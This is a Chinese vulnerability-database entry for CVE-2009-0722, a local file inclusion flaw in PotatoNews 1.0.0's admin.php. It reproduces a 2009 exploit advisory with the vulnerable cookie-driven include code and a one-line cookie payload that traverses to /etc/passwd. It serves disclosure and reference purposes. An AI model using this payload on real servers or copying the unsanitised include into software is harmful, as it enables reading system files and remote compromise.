https://www.exploit-db.com/exploits/8032
https://cxsecurity.com/issue/WLB-2009020270
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-545
Potato-scripts potato_news 脚本admin.php 目录遍历漏洞






漏洞ID | 1117387 | 漏洞类型 | 路径遍历 |
发布时间 | 2009-02-10 | 更新时间 | 2009-02-24 |
![]() |
CVE-2009-0722 | ![]() |
CNNVD-200902-545 |
漏洞平台 | PHP | CVSS评分 | 7.5 |
|漏洞来源
|漏洞详情
PotatoNews是一款用PHP开发的免费的新闻编辑脚本工具。PotatoNews1.0.0版本的admin.php中存在目录遍历漏洞。远程攻击者可以借助用户cookie参数中的一个..,包含和运行任意文件。
|漏洞EXP
#########################################################################################
[0x01] Informations:
Name : Potato News 1.0.0
Download :
http://potato-news.googlecode.com/files/potatonews-1.0.0.zip
Vulnerability : LFI
Author : x0r
Contact : andry2000@hotmail.it
Notes : Proud to be Italian
#########################################################################################
[0x02] Bug:
Bugged file is /[path]/admin.php
[Code]
<?PHP
if (isset($_COOKIE["user"])) {
$id = $_COOKIE["user"];
if (file_exists("data/users/$id.php")) {
include ("data/users/$id.php");
if ($usaavatar == "") {
echo "<img height='75px' width='75px' src='images/noav.jpg'/>";
} else {
echo "<img height='75px' width='75px' src='$usaavatar'/>";
}
}
[/code]
#########################################################################################
[0x03] Exploit:
Exploit: javascript:document.cookie =
"user=../../../../../../../../../../etc/passwd%00; path=/"
########################################################################################
# milw0rm.com [2009-02-10]
|参考资料
来源:BID
名称:33729
链接:http://www.securityfocus.com/bid/33729
来源:MILW0RM
名称:8032
链接:http://www.milw0rm.com/exploits/8032
检索漏洞
开始时间
结束时间